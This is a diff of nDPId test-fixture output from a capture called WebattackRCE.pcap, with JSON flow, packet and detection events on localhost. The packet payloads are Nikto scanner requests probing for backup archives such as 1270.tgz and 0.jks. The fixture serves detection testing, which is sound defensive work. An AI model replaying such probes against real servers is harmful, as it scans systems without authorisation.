+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 